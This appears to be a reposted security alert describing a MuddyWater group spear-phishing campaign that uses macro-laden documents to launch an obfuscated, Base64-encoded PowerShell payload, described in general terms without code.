Security Alert: New Spear Phishing Campaign Operated by the MuddyWater Group

[harlan4096]

In which malicious Powershell payload is used to spread malware

You probably heard about the hacking group known as “MuddyWater” which was behind previous spam campaigns targeting a wide range of industries and institutions in several countries across the Middle East, Europe, and the US.

Spotted for the first time in 2017, when the group hit the Saudi Government, future spam campaigns discovered by security researchers were also linked to the same group.

It appears that the authors of the MuddyWater group aren’t slowing down these attacks and continue to be highly active and persistent. Earlier this week, threat researchers observed another spam campaign in which the “Muddy Water” group has been involved.

How the infection spreads (some technical details included)

In the analyzed campaign, malicious actors are using social engineering techniques to bait potential victims from targeted organizations into enabling macros in the Microsoft office package.

It’s not the first time this attack vector is being used, but as long as it still works why not trying it, right?

In this scenario, users receive a phishing email with a document containing a VBA macro code which, if enabled, will compromise users’ systems by using a PowerShell payload.

See in the image below how the malicious document from the spam campaign looks like for the recipient.

If macros are enabled, cybercriminals will use Windows scripting host “//E” command line which is a Base64 encoded payload employing the obfuscation method.

Continue Reading